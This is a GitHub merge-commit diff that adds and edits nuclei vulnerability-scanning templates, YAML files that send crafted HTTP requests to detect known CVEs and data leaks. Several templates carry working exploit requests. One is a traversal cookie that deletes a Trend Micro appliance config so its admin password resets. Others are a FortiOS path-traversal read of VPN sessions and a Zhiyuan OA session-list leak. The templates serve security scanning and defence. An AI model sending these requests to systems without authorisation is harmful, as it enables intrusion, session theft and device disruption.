Merge pull request #15 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-02-25 13:46:01 +05:30 committed by GitHub
commit 4f4e83b173
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
15 changed files with 268 additions and 11 deletions

View File

@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 200 | vulnerabilities | 94 | exposed-panels | 74 |
| exposures | 52 | technologies | 46 | misconfiguration | 44 |
| cves | 204 | vulnerabilities | 96 | exposed-panels | 74 |
| exposures | 55 | technologies | 46 | misconfiguration | 48 |
| workflows | 21 | miscellaneous | 12 | default-logins | 10 |
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
| helpers | 2 | takeovers | 1 | - | - |
**61 directories, 584 files**.
**61 directories, 597 files**.
</td>
</tr>

View File

@ -0,0 +1,27 @@
id: CVE-2016-7552
info:
name: Trend Micro Threat Discovery Appliance Auth Bypass via Directory Traversal
author: dwisiswant0
severity: critical
reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
tags: cve,cve2016
# This template exploits an authentication bypass vulnerability via a file delete in logoff.cgi
# which resets the admin password back to 'admin' upon a reboot.
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/logoff.cgi"
headers:
Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Backtrace"
part: header

View File

@ -0,0 +1,32 @@
id: CVE-2017-7269
info:
name: CVE-2017-7269
author: thomas_from_offensity
severity: critical
description: RCE - Buffer overflow in ScStoragePathFromUrl function (WebDAV service - IIS 6.0) - Windows Server 2003 R2
# this was implemented based on the "check"-method in:
# https://github.com/danigargu/explodingcan/blob/master/explodingcan.py
requests:
- method: OPTIONS
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "IIS/6.0"
part: header
- type: dsl
dsl:
- regex("<DAV:sql>", dasl) # lowercase header name: DASL
- regex("[\d]+(,\s+[\d]+)?", dav) # lowercase header name: DAV
- regex(".*?PROPFIND", public) # lowercase header name: Public
- regex(".*?PROPFIND", allow) # lowercase header name: Allow
condition: or
part: header

View File

@ -9,8 +9,8 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
- "{{BaseURL}}/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
matchers:
- type: word
words:
- "var fgt_lang ="
- "var fgt_lang"

View File

@ -34,3 +34,9 @@ requests:
words:
- "Contact Site Administrators"
part: body
- type: word
words:
- "has not yet configured this contact form"
part: body
negative: true

View File

@ -6,8 +6,7 @@ info:
severity: medium
reference: https://www.oracle.com/security-alerts/cpuoct2020.html
tags: cve,cve2020,oracle,xss
# https://twitter.com/HackerOn2Wheels/status/1326927875279380480
source: https://twitter.com/HackerOn2Wheels/status/1326927875279380480
requests:
- method: GET
@ -23,4 +22,6 @@ requests:
words:
- "X-Oracle-Dms-Ecid:"
- "X-Oracle-Dms-Rid:"
- "Set-Cookie:"
part: header
condition: and

View File

@ -0,0 +1,19 @@
id: CVE-2020-22840
info:
name: CVE-2020-22840
author: geeknik
severity: low
description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.
tags: cve,cve2020,redirect,b2evolution
requests:
- method: GET
path:
- "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
part: header

View File

@ -0,0 +1,28 @@
id: CVE-2021-21972
info:
name: VMware vCenter Unauthorized RCE
author: dwisiswant0
severity: critical
reference: https://swarm.ptsecurity.com/unauth-rce-vmware/
description: The vulnerability allows unauthenticated remote attackers to upload file leading to remote code execution (RCE). This templates only detects the plugin.
tags: cve,cve2021,vmware,rce
requests:
- method: GET
path:
- "{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "VSPHERE-UI-JSESSIONID"
part: header
condtion: and
- type: regex
regex:
- "(Install|Config) Final Progress"
part: body

View File

@ -0,0 +1,28 @@
id: openapi
info:
name: OpenAPI
author: pdteam
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/openapi.json"
matchers-condition: and
matchers:
- type: word
words:
- application/openapi+json
part: header
- type: word
words:
- openapi
- paths
condition: and
- type: status
status:
- 200

View File

@ -56,6 +56,7 @@ requests:
- "swagger:"
- "\"swagger\":"
- "Swagger UI"
- "**token**:"
condition: or
- type: status

View File

@ -0,0 +1,30 @@
id: bower-json
info:
name: bower.json file disclosure
author: oppsec
severity: info
description: Bower is a package manager which stores packages informations in bower.json file
requests:
- method: GET
path:
- "{{BaseURL}}/bower.json"
matchers-condition: and
matchers:
- type: word
words:
- "name"
- "description"
- "main"
condition: and
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200

View File

@ -0,0 +1,29 @@
id: yarn-lock
info:
name: yarn lock file disclosure
author: oppsec
severity: info
description: yarn.lock is a file which store all exactly versions of each dependency were installed.
requests:
- method: GET
path:
- "{{BaseURL}}/yarn.lock"
matchers-condition: and
matchers:
- type: word
words:
- "# THIS IS AN AUTOGENERATED FILE. DO NOT EDIT THIS FILE DIRECTLY."
- "# yarn lockfile v1"
condition: and
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200

View File

@ -5,16 +5,20 @@ info:
author: pd-team
severity: low
tags: apache,rce
reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6
requests:
- method: POST
path:
- '{{BaseURL}}/ws/v1/cluster/apps/new-application'
matchers-condition: and
matchers:
- type: word
words:
- 'application-id'
- application-id
- maximum-resource-capability
condition: and
- type: status
status:
- 200
matchers-condition: and

View File

@ -0,0 +1,26 @@
id: zhiyuan-oa-info-leak
info:
name: Zhiyuan Oa A6-s info Leak
author: pikpikcu
severity: info
reference: https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md
tags: zhiyuan,leak,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0"
matchers-condition: and
matchers:
- type: word
words:
- "attachment"
- "application/x-msdownload"
part: header
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,26 @@
id: zhiyuan-oa-session-leak
info:
name: Zhiyuan Oa Session Leak
author: pikpikcu
severity: medium
reference: https://www.zhihuifly.com/t/topic/3345
tags: zhiyuan,leak,disclosure
requests:
- method: GET
path:
- "{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll"
matchers-condition: and
matchers:
- type: word
words:
- "<usrID>"
- "<sessionID>"
condition: and
- type: status
status:
- 200